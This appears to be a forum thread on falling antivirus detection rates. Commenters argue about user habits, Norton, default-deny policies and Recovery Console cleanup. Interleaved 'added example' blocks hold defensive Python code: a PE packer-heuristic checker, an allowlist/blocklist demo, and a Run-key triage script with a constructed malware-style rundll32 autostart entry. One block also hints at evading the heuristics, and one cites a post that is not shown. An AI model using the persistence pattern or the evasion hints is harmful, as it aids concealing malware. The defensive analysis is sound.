      99% of the users do not need to install software, run ActiveX controls or run executable things (scripts, programs, anything) on their computer. They need to use the software that was installed when they got it and nothing more. Opening the door to them installing any random piece of junk that comes along or executing some type of code from email or web pages is an invitation to disaster. It doesn't matter if it is Windows or Linux - if the user can authorize unsafe actions on the machine and does so blindly the machine will be compromised.

      Now it is true today that there are very few, if not zero, things that are targeting Linux. Most people run Windows and that is the environment that is targeted. But the problem isn't the operating system - you cannot protect the computer from an administrator that is a fool.

      The only real answer - which you might have done with a Linux system - is remove any possibility of the user doing anything outside of a small set of "user" actions. No administration. No software installs. No executing anything that wasn't there when the administrator set it up. Computers for these people are not general-purpose programming environments but simple appliances. Deviating from that "appliance" concept is where the trouble starts.

      If you gave your brother and uncle an appliance, more power to you. If you gave them a general purpose computer that they do not understand this isn't a solution.

    3. Re:The Real Reason by Anonymous Coward · · Score: 0

      The real reason is Windows, you say?
      I say the real reason is ignorance.
      I use Windows (as a gamer, I don't have much choice - while some games do have Linux or Mac versions, most don't), and I haven't had a virus infection since 1997 (one of those M$ Word macro viruses, courtesy of using an infected machine at college), just courtesy of plain common sense: not opening dodgy e-mail attachments, not downloading stuff that looks untoward (as a matter of fact the only things I download are games-related and TV eps from BitTorrent), and using a browser with ad and pop-up blockers (ATM that's Firefox.)
      Mind you, I think vendors who sell pre-installed systems are partly to blame. If more PC vendors properly configured a new Windows installation and maybe installed Firefox as default browser, for example, the rate of infection would probably drop if not overnight, fairly sharply.

  30. AV software causes more problems than it solves by Tridus · · Score: 2, Interesting

    I've known that AV software doesn't work very well for quite a while. Its really nothing new. It is nice to have someone doing tests that I can shove in peoples faces, though.

    This isn't the biggest problem though. AV software is actively harmful. Aside from dramatically slowing down EVERYTHING, it can flat out break stuff. Norton in particular is notorious for screwing things up, to the point that if someone asks me about a problem with their computer now, my first answer is always "uninstall Norton."

    Running the gamut from games being intolerably slow to programs crashing to drivers inexplicably failing to install (even after turning Norton off), to date "uninstall Norton" has never failed to fix the problem.

    (Really, Norton and the virus makers themselves aren't much different, in that both of them prey on the computer illiterate.)

    --
    -- "So they told me that using the download page to download something was not something they anticipated." - Bill Gates
    1. Re:AV software causes more problems than it solves by Opportunist · · Score: 2, Interesting

      You judge the AV industry by your experience with Norton. That's like saying cars are crap because you didn't like that old Lada you got.

      It's a bit like saying webcams crash your system because you had one from Logitech (whose driver actually does just that). Or like saying OSs suck because you've seen what Vista is like.

      There are decent AV companies about who do take care that the footprint they leave in the system is small, and that their drivers (which have to be quite invasive, unfortunately) don't ruin the system they're supposed to protect. Please don't judge the whole industry by one single experience.

      --
      We used to have a Bill of Rights. Now, with the rights gone, all we have left is the bill.
    2. Re:AV software causes more problems than it solves by Anonymous Coward · · Score: 0

      Sadly I've been known to have all those issues even though this machine has never had a copy of Norton within forty miles of it.

      However I believe the fault to lie with my graphics card and/or the nVidia Forceware drivers.

    3. Re:AV software causes more problems than it solves by Kayyham · · Score: 1

      Yeah, I've never had AV software on my home computer, and to this day I've never had a virus that's slowed down or screwed up my computer more than anti-virus software does. The cure is worse than the disease!

  31. Of course effectiveness is falling... by A+Pressbutton · · Score: 3, Insightful

    And it will fall still further.
    Time was a virus would either just pop up an annoying message or delete random data or reformat your PC. Effectively viruses and virus writers were hunters and once they had got the target they had no further interest.

    Virus writers have now become 'civilised' farmers. They now get paid for their efforts.
    The writers have a tame herd (of infected PCs). They will spend their time trying to make sure the AV software will not interfere (to them these things are the infection). They spend their time tending their herd and catching 'wild' examples - other people's viruses - so they can cross-breed.

    One consequence of this (if correct) is that viruses may well start to remove other infections, and generally tune up your PC. After all, if your PC is working just fine, why would you bother keeping the AV scanner up to date?

    1. Re:Of course effectiveness is falling... by SixFactor · · Score: 1

      That is an excellent analogy: hunter/gatherers transformed into farmers (or ranchers). Tend the crops (or herd), and they ensure continued profitability.

      I like it.

      --
      Science never settles, never rests.
  32. Re:I have the solution by Opportunist · · Score: 1

    I tried that too, and it was the only time I ever got infected by accepting some random packets. No thanks, I'll stay with what I know.

    --
    We used to have a Bill of Rights. Now, with the rights gone, all we have left is the bill.
  33. yes it can by Anonymous Coward · · Score: 2, Informative

    man cron; man at

  34. There is a better strategy by Frozen+Void · · Score: 1

    Never install anything executable where you do not trust the author.
    Not a single virus in all these years.
    And if you do really need something, try
    http://www.virustotal.com/en/indexx.html

  35. Viruses are a 'stupid user' issue by SCHecklerX · · Score: 3, Informative

    You can't hope to really fix bad behavior with technology. This is why instead of giving dad a false sense of security with cpu/disk thrashing AV software, I took the time to show him the nastiness that can go on, especially with email attachments, and downloading and running software he doesn't know anything about. I also set him up with firefox with the adblock plus extension. On his own (even though I didn't feel it was necessary), he manually runs adware detecting software to make sure nothing has been slipping by. Three years, and he has yet to be infected with anything (manual AV scan with latest signatures when I was there the other day confirms).

    Tools and their uses:
    - Firewalls: block stuff you shouldn't be listening for anyway, also help to mitigate against attacks against stuff you do listen for.
    - Service Lockdown (difficult on windoze, see "Firewalls" above): You can't exploit something that's not there
    - Proper configuration of what you do need listening: default stuff on that linksys router, for example
    - Patches: Deal with worms (not viruses)
    - AV software: tries to correct user stupidity. Not exactly a winning battle, as can be seen by the existence of this article.
    - IDS: Never for an end user. How are they to know how to tune it, and what the messages mean, etc?

    My experience has been that AV software gets in the way, causes system instability, and provides a false sense of security. None of this provides a significant benefit for a user who already practices good hygiene on their computer.

    1. Re:Viruses are a 'stupid user' issue by gardyloo · · Score: 1

      You can't hope to really fix bad behavior with technology. Don't tase me, bro!
  36. Why the drugs don't work anymore by Opportunist · · Score: 3, Interesting

    It was bound to happen. Actually I'm amazed it's considered news.

    The malware-antimalware war ain't a static one. Both sides are engaging in a quite impressive arms race. They start creating morphing trojans, we create ways to detect them, they create global trojan floods, we employ detection networks to catch them, they switch from mail distribution to infected webpages, we start sending out spiders, they start using targeted spam, we create fake personalities to be "interesting" for them, they ...

    It's just the same with the detection and elimination routines. They use certain API calls, we start listening to those calls carefully, they switch the calls, we follow, they start using executable packers, we develop exec unpackers, we discover that malware PE headers have a certain format, they change the format and create "filler" sections to look normal...

    It's just a chapter in that arms race. Give us 2 months and we're back on par.

    --
    We used to have a Bill of Rights. Now, with the rights gone, all we have left is the bill.
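An added example, not code from the c't test, from Opportunist, or from any AV vendor, of the section-table heuristics that the two posts above talk around (24/1 on copy protection looking like malware, and this one on packers and PE headers). It walks the PE section table and flags the usual packer tells: a section that is both writable and executable, a non-standard section name, a section with no raw data but a large virtual size (the unpack target), high-entropy contents, and an entry point outside any code section. The two PE images are constructed in memory; the names UPX0/UPX1 follow the real UPX layout, while the 7.0-bit entropy threshold and the 0x1000 size cut-off are arbitrary choices for the demo. A copy-protected game would trip exactly the same checks, which is the ambiguity 24/1 describes: a scanner that keys on these signals alone cannot tell the two apart.

```python
import hashlib
import math
import struct

# IMAGE_SCN_* section characteristics from the PE/COFF specification
SCN_CODE = 0x00000020
SCN_MEM_EXECUTE = 0x20000000
SCN_MEM_READ = 0x40000000
SCN_MEM_WRITE = 0x80000000

# Names a normal linker emits; anything else is merely "unusual", not malicious.
COMMON_SECTIONS = {".text", ".data", ".rdata", ".bss", ".idata", ".edata",
                   ".rsrc", ".reloc", ".tls", ".pdata", ".CRT"}

def shannon_entropy(data):
    """Bits per byte: 0.0 for empty input, close to 8.0 for random bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)

def parse_sections(pe):
    """DOS header -> e_lfanew -> COFF header -> skip optional header -> 40-byte section entries."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    nsections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    opt = coff + 20
    entry_rva = struct.unpack_from("<I", pe, opt + 16)[0]  # AddressOfEntryPoint, PE32 and PE32+
    sections, off = [], opt + opt_size
    for _ in range(nsections):
        name, vsize, vaddr, rawsize, rawptr = struct.unpack_from("<8sIIII", pe, off)
        chars = struct.unpack_from("<I", pe, off + 36)[0]
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "vsize": vsize, "vaddr": vaddr, "rawsize": rawsize,
                         "chars": chars, "raw": pe[rawptr:rawptr + rawsize]})
        off += 40
    return entry_rva, sections

def packer_indicators(pe):
    """(section, reason) findings; several together suggest a packer, but a protected game trips the same checks."""
    entry_rva, sections = parse_sections(pe)
    findings = []
    for s in sections:
        if s["chars"] & SCN_MEM_EXECUTE and s["chars"] & SCN_MEM_WRITE:
            findings.append((s["name"], "writable and executable"))
        if s["name"] not in COMMON_SECTIONS:
            findings.append((s["name"], "non-standard section name"))
        if s["rawsize"] == 0 and s["vsize"] >= 0x1000:   # 0x1000: demo cut-off
            findings.append((s["name"], "no raw data but large virtual size (unpack target)"))
        if s["rawsize"] and shannon_entropy(s["raw"]) > 7.0:   # 7.0 bits: demo threshold
            findings.append((s["name"], "high-entropy contents (compressed or encrypted)"))
    home = next((s for s in sections
                 if s["vaddr"] <= entry_rva < s["vaddr"] + max(s["vsize"], s["rawsize"])), None)
    if home is None:
        findings.append(("<none>", "entry point outside every section"))
    elif not home["chars"] & (SCN_CODE | SCN_MEM_EXECUTE):
        findings.append((home["name"], "entry point in a non-code section"))
    return findings

def build_pe(sections, entry_rva):
    """Minimal PE32 image built in memory as a fixture (not loadable); sections are (name, vaddr, vsize, raw, chars)."""
    e_lfanew, opt_size = 0x40, 224
    hdr_end = e_lfanew + 4 + 20 + opt_size + 40 * len(sections)
    raw_start = (hdr_end + 0x1FF) & ~0x1FF                       # 0x200 file alignment
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x102)
    opt = struct.pack("<HBBIIII", 0x10B, 2, 0, 0, 0, 0, entry_rva).ljust(opt_size, b"\0")
    table, body, ptr = b"", b"", raw_start
    for name, vaddr, vsize, raw, chars in sections:
        table += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"), vsize, vaddr,
                             len(raw), ptr if raw else 0, 0, 0, 0, 0, chars)
        body += raw
        ptr += len(raw)
    return (dos + b"PE\0\0" + coff + opt + table).ljust(raw_start, b"\0") + body

def samples():
    """Two constructed images: an ordinary layout and a UPX-style packed one."""
    text = b"\x55\x8b\xec\x83\xec\x10\x90\xc3" * 512      # repetitive, low-entropy code bytes
    data = b"Hello\0" * 200
    stub = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(128))  # 4 KiB, ~8 bits/byte
    rwx = SCN_MEM_EXECUTE | SCN_MEM_READ | SCN_MEM_WRITE
    return {
        "plain": build_pe([(".text", 0x1000, len(text), text, SCN_CODE | SCN_MEM_EXECUTE | SCN_MEM_READ),
                           (".data", 0x3000, len(data), data, SCN_MEM_READ | SCN_MEM_WRITE)], 0x1000),
        "packed": build_pe([("UPX0", 0x1000, 0x8000, b"", rwx),              # empty unpack target
                            ("UPX1", 0x9000, len(stub), stub, SCN_CODE | rwx)], 0x9000),
    }

if __name__ == "__main__":
    for label, image in samples().items():
        print(label, packer_indicators(image) or "no indicators")
```

The "filler sections" trick Opportunist mentions is the obvious counter: give the packed sections ordinary names and pad them with low-entropy data, and every one of these checks goes quiet, which is why a real engine has to unpack and look at what actually runs rather than stop at the header.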
  37. A quote from c't article by Thelasko · · Score: 1

    "Alles turisten und nonteknischen lookenpeepers! Das komputermaschine ist nicht für der gefingerpoken und mittengraben! Oderwise ist easy to schnappen der springenwerk, blowenfusen und poppencorken mit spitzensparksen. Ist nicht für gewerken bei dummkopfen. Der rubbernecken sightseeren keepen das cottonpicken händer in das pockets muss. Zo relaxen und watschen der blinkenlichten. "

    --
    One of our competitors trademarked the term "hypothesis". From now on, we will call them "boneheaded ideas".
  38. Skewed by raijinsetsu · · Score: 2, Interesting

    I don't think that it's the effectiveness of the heuristics that has decreased. It's probably that the virus and malware programmers have gotten craftier: studying how these algorithms work and countering them. It's one of the reasons why I stay away from the mainstream AVs.

  39. No FUD please... Packagemanagement is the problem by jopsen · · Score: 1

    The reason that Linux is largely unaffected is that it is not very widely used, especially by the sort of numpties that get tempted by exciting new screensavers bearing trojans

    One word: FUD!

    The biggest problem for the Windows desktop today is that most applications aren't updated... Most people don't update Java, QuickTime, Acrobat, Media Player, Flash or even their browser. And doing this is rather difficult; by now many more of them have automatic updaters, but most people ignore those, or switch them off because they are annoying.
    Applications like these are the ones making Windows very insecure; of course Windows Update, which doesn't work very well, contributes a lot too... But the lack of a system-wide update manager, or package manager if you like, is why millions of PCs need virus protection.

    On Linux apps are usually patched very fast and all apps are updated through the package manager. If the update manager didn't pop up every second day or so, I'd never update my apps... Especially not if I had to download a separate installer/updater, as most Windows apps still require...

    On my parents' Windows machine, which I borrow from time to time for printing, I use Opera... I think it's version 8.x, and every time I start it, it pops up saying there's an updated version. But I just want to go online to download a document for printing, or who knows what, and I close it instead of actually bothering to update Opera :)
  40. copy protection mechanisms == malware by jopsen · · Score: 1

    In short, copy protection mechanisms share a fair lot of features with malware. It is often not easy to discriminate between them.

    Why not make it clear: copy protection mechanisms are malware... They do not serve you! And Sony's rootkit was installed with your consent, in the sense that you clicked OK to something a lawyer wrote, but no one else has read...
    1. Re:copy protection mechanisms == malware by Opportunist · · Score: 1

      Because that would mean you find every single current game as malware. Can you imagine the outcry?

      For reference, see grandparent.

      --
      We used to have a Bill of Rights. Now, with the rights gone, all we have left is the bill.
  41. I have a novel solution... by Anonymous Coward · · Score: 0

    Instead of wasting effort on the unwinnable war of detecting malicious intent in executable software -- perhaps people should concentrate on preventing said execution in the first place.

  42. Oh great, the retarded mods are out again by Colin+Smith · · Score: 1

    Apparently they are unaware that the diversity which sexual reproduction creates effectively limits the size of the population which a virus can infect, severely curtailing the spread.

    --
    Deleted
  43. AV Comparatives by sh33333p · · Score: 2, Interesting

    Since this article is about a print article in German, you may want to check out the site http://www.av-comparatives.org/

    Malware is an arms race, and the comments about AV software being useless are bull. It just isn't a panacea either. Schneier says security is a trade-off. Average users don't want to be inconvenienced by things like applying the principle of least privilege. Personally I use SudoWn and Runasspc with my XP Pro system when I need to elevate something to admin, and a combination of Avira/Spybot-SD and Firefox with NoScript. That's the software side. The most important thing I do for my security is to mistrust everything by default. I don't install stuff that's likely to be infected. Even if I think something is safe, I scan it manually before I run it with admin privs. I've been virus/malware free since I put this system together back in March of this year, and I've probably installed nearly 100 applications in that time.

    PS: The later versions don't seem to work for me, but version 2.0 of SudoWn does, and it requires .Net 2.0.
    Hopefully this is helpful to at least one person.

  44. Read Fred Cohen on what is a virus by starfishsystems · · Score: 1
    I don't know why either. Well, I do know why, and it comes down to a remarkably cavalier design decision by one particular software vendor.

    Default Allow is fundamentally not a basis from which a system can be secured. It forces every system user to maintain perfect knowledge of a changing universe. Default Allow plus virus detection is, in the limit, equally doomed. Fred Cohen pointed out over two decades ago that virus detection is equivalent to solving the Halting Problem. Either way, it signs us up for an infinite amount of work.

    Default Deny, on the other hand, certainly requires us to do some work, to consciously qualify those 30 pieces of Goodness. That requires explicit effort, but it's a finite amount of work. So why, in the face of such clear advantages, do so many people want to avoid this policy? I can only think that they resist the idea of responsibility. And that's a matter of perception, something that I hope people will eventually come to rethink.

    --
    Parity: What to do when the weekend comes.
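To put the Default Allow versus Default Deny argument in concrete terms, here is an added example (mine, not starfishsystems' or Fred Cohen's) of both policies as an execution check keyed on the SHA-256 of the image. Under Default Allow the only lever is a blocklist of hashes you have already seen, so a repacked variant is a fresh hash and runs; under Default Deny the allowlist grows only when you consciously approve a program, and everything unseen is refused. The "binaries" are constructed byte strings and the variant generator is a deliberately crude model of repacking, both assumptions of the example.

```python
"""Default-allow (blocklist) versus default-deny (allowlist) execution
policy keyed on SHA-256 of the image.  Added example to illustrate the post's
argument; the 'binaries' below are constructed byte strings, not programs."""
import hashlib
import random


def image_hash(image: bytes) -> str:
    return hashlib.sha256(image).hexdigest()


class ExecPolicy:
    """default-allow: run unless the hash is blocklisted.
    default-deny:  block unless the hash is allowlisted."""

    def __init__(self, mode: str):
        if mode not in ("default-allow", "default-deny"):
            raise ValueError(mode)
        self.mode = mode
        self.allowlist = set()
        self.blocklist = set()

    def approve(self, image: bytes) -> None:
        """Finite work: one entry per program the user consciously qualifies."""
        self.allowlist.add(image_hash(image))

    def blocklist_sample(self, image: bytes) -> None:
        """Open-ended work: one entry per malicious sample already observed."""
        self.blocklist.add(image_hash(image))

    def decide(self, image: bytes) -> str:
        h = image_hash(image)
        if self.mode == "default-deny":
            return "run" if h in self.allowlist else "block"
        return "block" if h in self.blocklist else "run"


# Constructed stand-ins for executables (not real PE files).
GOOD_APP = b"MZ\x90\x00constructed-good-application-v1"
TROJAN = b"MZ\x90\x00constructed-trojan-sample"


def mutate(image: bytes, seed: int) -> bytes:
    """Crude model of a repacked/polymorphic variant: same program, one byte
    changed outside the MZ stub, so the hash no longer matches the sample."""
    rng = random.Random(seed)
    pos = rng.randrange(4, len(image))
    return image[:pos] + bytes([image[pos] ^ 0x01]) + image[pos + 1:]


def compare_policies(n_variants: int = 100) -> dict:
    """Run the good app, the known trojan and n unseen variants of the trojan
    through both policies; report how many variants each policy lets run."""
    allow_mode = ExecPolicy("default-allow")
    allow_mode.blocklist_sample(TROJAN)   # signature for the one sample seen
    deny_mode = ExecPolicy("default-deny")
    deny_mode.approve(GOOD_APP)           # the user qualified this program
    variants = [mutate(TROJAN, i) for i in range(n_variants)]
    return {
        "good_app": (allow_mode.decide(GOOD_APP), deny_mode.decide(GOOD_APP)),
        "known_trojan": (allow_mode.decide(TROJAN), deny_mode.decide(TROJAN)),
        "variants_run_default_allow": sum(allow_mode.decide(v) == "run" for v in variants),
        "variants_run_default_deny": sum(deny_mode.decide(v) == "run" for v in variants),
    }


if __name__ == "__main__":
    for key, value in compare_policies().items():
        print(key, value)
```

Both policies handle the two programs they know about identically; the difference is entirely in the unseen variants, where the blocklist lets every one through and the allowlist refuses every one. The cost of the allowlist is the approve() call per installed program, the "30 pieces of Goodness" of the post.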
  45. viruses definitely better in windows by datapharmer · · Score: 1

    I have been removing viruses from friends' and clients' computers since I was 8 years old (I'm almost 24). 99% of these have been on Microsoft OSes or DOS-esque OSes. I have never failed to clean a system until yesterday.

    Using a combination of virus removal tools, a process viewer and a few other security tools on a CD-R, I've been able to find every instance every time - until yesterday. In a few cases I've had to replace some system files due to them getting completely destroyed, or had to repair an MBR, but never before did I have to say "time to do a low level format and start over"....

    I had installed and cleaned this guy's system about 2 years ago. He was set up with a non-admin account to use and automatically renewing virus scanning, Ad-Aware, and several other security tools.

    Yet after his niece used the PC it became infected.

    I could see this virus running; I even found 1 virus with F-PROT - AVG, Kaspersky, Avast, and BitDefender all found nothing. I had to run them from a boot CD because the virus had done something funky with administrator rights even under safe mode.

    I felt horrible, because truth be told, if I back up his documents, I can't honestly tell him reloading them on a clean system won't bring back the virus - the detectors couldn't find them before, they may not again.

    All I could say was I'll make a ghost disc so you can get the system back to normal by yourself. I haven't dealt with Vista viruses yet, but there is no stopping a novice p2p user from getting a virus.

    --
    Get a web developer
  46. datapharmer, use RECOVERY CONSOLE by Anonymous Coward · · Score: 0

    "I could see this virus running, I even found 1 virus with F-PROT" - by datapharmer (1099455) on Friday December 21, @04:20PM (#21784590)

    IF you can get its name & location on disk, boot to RECOVERY CONSOLE & fry it there (nothing will be loading & thus locking it, there).

    It's THAT, or using Process Explorer: suspend the calling process, found by watching loaded DLLs (CTRL+D with the lower pane view set like that), IF there is one and this thing doesn't launch by itself from one of the registry RUN areas or startup groups, that is...

    Using Process Explorer can help, especially if this is being run by "DLL Injection" (like an OLEServer being injected into a process via CLSIDs, shell extensions, or being run by rundll32.exe OR svchost.exe, process hosting executables that can spawn either .exe OR .dll/lib based ones).

    The easier/simpler route? Use Recovery Console, once you have its name & location on disk... DEL command will take care of it, lickety-split, no-shit.

    APK

  47. datapharmer: ProExp (better yet, RECOVERY CONSOLE) by Anonymous Coward · · Score: 0

    "I could see this virus running, I even found 1 virus with F-PROT" - by datapharmer (1099455) on Friday December 21, @04:20PM (#21784590)

    IF you can get its name & location on disk, boot to RECOVERY CONSOLE and switch to the folder that houses it using CD (almost like the DOS one, but uses .. ONLY to switch to ancestor folder roots, really (instead of \ etc. et al))!

    Then, once you are in its folder, fry it then (nothing will be loading & thus, locking it, there) using the DEL command -> DEL filename.

    ----

    It's THAT, or using Process Explorer in UserMode/Ring 3/RPL3 operation...

    You would suspend the calling process via the right-click popup menu options it offers for this!

    (This is assuming this is a lib-loaded virus/spyware/trojan/malware etc., not a standalone .exe type)

    That's done via watching loaded DLLs that ANY app may have loaded presently (for that, you would have to use ProExp's CTRL+D keystroke shortcut, with the lower pane view present/visible & set like that), IF there is one and this thing doesn't launch by itself from one of the registry RUN areas or startup groups, that is...

    Using Process Explorer can help!

    (Again, especially if this is being run by "DLL Injection" (like an OLEServer being injected into a process via CLSIDs, shell extensions, or being run by rundll32.exe OR svchost.exe, process hosting executables that can spawn either .exe OR .dll/lib based ones)).

    ----

    The easier/simpler route?

    My first suggestion:

    Use Recovery Console, once you have its name & location on disk... DEL command will take care of it, lickety-split, no-shit.

    APK
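Both of APK's replies (46 and 47) hinge on one input: the file's name and location on disk, typically pulled from the registry RUN areas or a rundll32/svchost host process. As an added example (mine, not APK's), here is a Python script that triages an exported .reg file of the Run keys offline and turns each suspicious entry into the CD/DEL pair his Recovery Console step needs. The export, the user profile path and the dfhjk.dll / msupdate.exe names are constructed for the example; the "user-writable folder" list and the system-process-name list are my assumptions about an XP box, and the prefix probing for unquoted paths with spaces is an approximation of how the loader resolves them.

```python
"""Autostart triage from a .reg export of the Run keys.  Added example (not
from the posts): parses the export offline, flags entries a hand cleanup would
look at first, and emits the CD/DEL steps for the Recovery Console.  The
export and every file name in it are constructed for this example."""
import ntpath
import re

KEY_LINE = re.compile(r"^\[(.+)\]$")
VALUE_LINE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')
# Folders an unprivileged user (or a drive-by running as that user) can write to.
USER_WRITABLE = ("\\temp\\", "\\local settings\\", "\\application data\\",
                 "\\documents and settings\\", "\\docume~1\\")
SYSTEM_NAMES = {"svchost", "lsass", "csrss", "winlogon", "services", "explorer"}
EXE_SUFFIXES = (".exe", ".dll", ".scr", ".com")


def reg_unescape(s: str) -> str:
    """.reg files escape backslash and double quote with a backslash."""
    out, i = [], 0
    while i < len(s):
        if s[i] == "\\" and i + 1 < len(s):
            out.append(s[i + 1])
            i += 2
        else:
            out.append(s[i])
            i += 1
    return "".join(out)


def parse_reg(text: str) -> list:
    """Return [(key, value_name, command)] for every string value in the export."""
    entries, key = [], None
    for line in text.splitlines():
        line = line.strip()
        m = KEY_LINE.match(line)
        if m:
            key = m.group(1)
            continue
        m = VALUE_LINE.match(line)
        if m and key:
            entries.append((key, reg_unescape(m.group(1)), reg_unescape(m.group(2))))
    return entries


def split_command(cmd: str) -> tuple:
    """Split an autostart command into (host_executable, arguments)."""
    cmd = cmd.strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        return cmd[1:end], cmd[end + 1:].strip()
    # Unquoted path with spaces: approximate the loader's prefix probing by
    # taking the shortest prefix that ends in an executable extension.
    parts = cmd.split(" ")
    for i in range(1, len(parts) + 1):
        head = " ".join(parts[:i])
        if head.lower().endswith(EXE_SUFFIXES):
            return head, " ".join(parts[i:]).strip()
    return parts[0], " ".join(parts[1:]).strip()


def triage(entries: list) -> list:
    """Return findings {key, name, target, reasons} for suspicious entries."""
    findings = []
    for key, name, cmd in entries:
        host, args = split_command(cmd)
        target, hosted = host, False
        if ntpath.basename(host).lower() == "rundll32.exe":
            # rundll32 <dll>,<entry>: the DLL is what actually runs
            target, hosted = args.split(",", 1)[0].strip().strip('"'), True
        low = target.lower()
        reasons = []
        if any(folder in low for folder in USER_WRITABLE):
            reasons.append("lives in a user-writable folder")
        if name.lower() in SYSTEM_NAMES and "\\system32\\" not in low:
            reasons.append("value name mimics a system process")
        if reasons:
            if hosted:
                reasons.insert(0, "DLL hosted by rundll32.exe")
            findings.append({"key": key, "name": name, "target": target,
                             "reasons": reasons})
    return findings


def recovery_console_steps(finding: dict) -> list:
    """The posts' procedure: CD into the folder, then DEL the file by name."""
    folder, filename = ntpath.split(finding["target"])
    return [f"cd {folder}", f"del {filename}"]


# Constructed export: two ordinary entries and two that should be flagged.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SoundMan"="SOUNDMAN.EXE"
"Adobe Reader Speed Launcher"="\"C:\\Program Files\\Adobe\\Reader 8.0\\Reader\\Reader_sl.exe\""
"svchost"="C:\\WINDOWS\\system32\\rundll32.exe C:\\DOCUME~1\\user\\LOCALS~1\\Temp\\dfhjk.dll,DllMain"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"msupdate"="C:\\Documents and Settings\\user\\Application Data\\msupdate.exe"
'''

if __name__ == "__main__":
    for f in triage(parse_reg(SAMPLE_REG)):
        print(f["key"], f["name"], f["target"], f["reasons"], recovery_console_steps(f))
```

Export the two Run keys with regedit (or reg export), run the script against the file, and the output is the list APK asks for: which value to remove and the exact folder and file name to CD to and DEL from the Recovery Console. A DLL loaded through rundll32 shows up as its DLL path, not as rundll32.exe, which is the case where deleting the "process" you see in Process Explorer would hit the wrong file.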